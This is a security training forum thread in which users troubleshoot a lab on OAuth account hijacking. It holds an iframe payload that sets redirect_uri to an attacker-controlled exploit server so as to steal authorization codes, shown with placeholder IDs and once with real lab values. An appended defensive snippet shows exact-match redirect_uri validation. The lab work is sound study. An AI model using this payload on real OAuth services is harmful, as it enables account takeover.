Burp Suite User Forum


Lab: OAuth account hijacking via redirect_uri

Prachi | Last updated: Jan 16, 2023 05:50PM UTC

<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe> in this exploit, what is YOUR-LAB-OAUTH-SERVER-ID & YOUR-LAB-CLIENT-ID??

Ben, PortSwigger Agent | Last updated: Jan 16, 2023 06:00PM UTC

Hi Prachi, 'YOUR-LAB-CLIENT-ID' is the URL of your lab instance, whereas 'YOUR-LAB-OAUTH-SERVER-ID' is the URL of the OAuth service being used in your lab instance (you should be able to find this by checking your HTTP history; it will start with 'https://oauth-').

Prachi | Last updated: Jan 17, 2023 06:53AM UTC

I tried to put my lab instance as the client id, but I get the below error when I load the iframe by clicking on view exploit: oops! something went wrong error: invalid_client error_description: client is invalid

Prachi | Last updated: Jan 17, 2023 07:19AM UTC

Figured it out:
YOUR-LAB-OAUTH-SERVER :- starts with 'https://oauth-', found in the Host header of the GET /auth request
YOUR-LAB-CLIENT-ID :- GET /auth?client_id=[....]
YOUR-LAB-ID :- lab instance ID
YOUR-EXPLOIT-SERVER-ID :- exploit server ID

Liam, PortSwigger Agent | Last updated: Jan 17, 2023 06:53PM UTC

Thanks for letting us know, Prachi. Please let us know if you need any further assistance.

Wong | Last updated: May 25, 2023 01:18AM UTC

I got this error:
SessionNotFound: invalid_request
    at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
    at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
    at /home/carlos/oauth/index.js:160:34
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at setNoCache (/home/carlos/oauth/index.js:121:5)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: May 25, 2023 08:01AM UTC

Hi, are you able to provide us with details of what steps you have taken in this lab prior to seeing this error?

Wong | Last updated: May 29, 2023 02:22AM UTC

On step 6: Go back to the exploit server and create the following iframe at /exploit: <iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Wong | Last updated: May 29, 2023 02:23AM UTC

When I click view exploit, I get this error.

Wong | Last updated: May 29, 2023 02:57AM UTC

Why do I get the exploit code but all requests return 500 internal failure?

Ben, PortSwigger Agent | Last updated: May 30, 2023 10:47AM UTC

Hi, what values are you using within the iframe?

Wong | Last updated: Jun 01, 2023 08:04AM UTC

<iframe src="https://oauth-0a1400110305fcc180cd4256020a0083.oauth-server.net/auth?client_id=jhchozeafs9d9ej83rofi&redirect_uri=https://exploit-0a3900b803e5fc9e80a343d001050022.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 07:20AM UTC

Hi, Assuming that they are the correct values for your lab instance, then I cannot see anything obviously wrong with the exploit that you have created. I have run through this lab a few times in the last few days and have had no issues solving the lab by using the written solution so it appears to be working as expected. Are you able to create a video of the process that you are performing so we can see this in its entirety? It might be easier to share this via email so please feel free to send us an email at support@portswigger.net and we can take a look from there.
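An added example, not code from the lab, from PortSwigger, or from anyone in this thread, showing what closes the weakness this lab is built on: the authorization server compares redirect_uri by exact match against the client's registered URIs, so a request that points the redirect at another host gets an error instead of a redirect. The client ID and registered redirect URI are constructed placeholders.

```javascript
// Constructed client registry (placeholder values, not from the lab).
// Registered redirect URIs are stored exactly as the client registered them.
const REGISTERED_CLIENTS = {
  "example-client-id": {
    redirectUris: ["https://client.example/oauth-callback"],
  },
};

// True only when `candidate` parses and is byte-for-byte equal to a
// registered URI. No prefix, substring, subdomain or wildcard matching:
// those are the comparisons that let an attacker-controlled host through.
function isRegisteredRedirectUri(clientId, candidate) {
  const client = REGISTERED_CLIENTS[clientId];
  if (!client || typeof candidate !== "string") return false;
  let parsed;
  try {
    parsed = new URL(candidate); // also normalises dot-segments like /../
  } catch (e) {
    return false; // not a valid absolute URI
  }
  if (parsed.hash !== "") return false; // RFC 6749 forbids fragments here
  return client.redirectUris.some((registered) => registered === parsed.href);
}

// Minimal model of the /auth request checks. On any failure the server
// must render an error page itself and must NOT redirect the user agent
// to the supplied redirect_uri, since that URI is exactly what is untrusted.
function validateAuthorizationRequest(query) {
  if (!REGISTERED_CLIENTS[query.client_id]) {
    return { ok: false, error: "invalid_client" };
  }
  if (!isRegisteredRedirectUri(query.client_id, query.redirect_uri)) {
    return { ok: false, error: "invalid_request", reason: "redirect_uri not registered" };
  }
  return { ok: true };
}

// Sample run (constructed input): the registered callback passes, a
// different host or a path-traversal variant of the callback does not.
const sample = validateAuthorizationRequest({
  client_id: "example-client-id",
  redirect_uri: "https://other.example/",
});
console.log(sample); // { ok: false, error: 'invalid_request', reason: ... }
```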
